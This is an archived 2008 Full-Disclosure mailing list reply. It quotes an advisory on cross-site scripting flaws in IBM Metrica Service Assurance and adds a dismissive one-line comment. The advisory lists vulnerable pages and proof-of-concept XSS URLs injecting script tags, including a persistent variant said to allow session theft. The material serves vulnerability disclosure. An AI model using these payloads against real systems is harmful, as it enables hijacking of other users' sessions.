| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 08 Nov 2008 15:53:27 -0600
From: rholgstad <rholgstad@...il.com>
To: Francesco Bianchino <f.bianchino@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Metrica Service Assurance Multiple Cross Site
Scripting
post auth xss
*yawn*
Francesco Bianchino wrote:
> Metrica Service Assurance Multiple Cross Site Scripting
>
> ***********************************************************************
>
> Author: Francesco Bianchino
>
> Email: f.bianchino@...il.com
>
> Title: Metrica Service Assurance Multiple Cross Site Scripting
>
> Vendor: IBM
>
> ***********************************************************************
>
> Summary
>
> Metrica Service Assurance Framework implements a distributed,
> object-oriented, J2EE-based architecture. It work with a Web-based
> user interfaces, from end-user report generation to detailed system
> administration and configuration.
>
> ***********************************************************************
>
> Vulnerability Detail
>
> The web-based interface of Metrica Service Assurance is exposed to
> multiple XSS attack. With an authenticated user it's possible to steal
> other user's sessions due to a flaw in the input validation
> mechanisms.
> A persistant XSS permits the insertion of malicious code into the
> web-based interface. Using the report generation function it is
> possible to create a report with malicious code in the name.
> That code is than rendered on the victim's browser when opening the
> report history which can be found in the main panel of the
> application.
> The code also persists into the main panel and all the users are
> exposed to the attack.
>
> There are at least three vulnerable pages:
>
> Non persistant:
> * http://server/<document root>/ReportTree
> * http://server/<document root>/Launch
>
> Peristant:
> * http://server/<document root>/ReportRequest
>
> ***********************************************************************
>
> Exploit
>
> http://server/<document
> root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non
> persistant XSS");</SCRIPT><!--&date=0000000000000
>
> http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non
> Persistant XSS");</SCRIPT>
>
> http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant
> XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main
>
> ***********************************************************************
>
> Solution
>
> At the moment of writing this advisory the is no solution yet.
>
> ***********************************************************************
>
> Credits
>
> Discovered and advised to IBM, November 2008 by Francesco Bianchino.
> Thanks to Marco borza and to da EthicalHAkinTeam.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists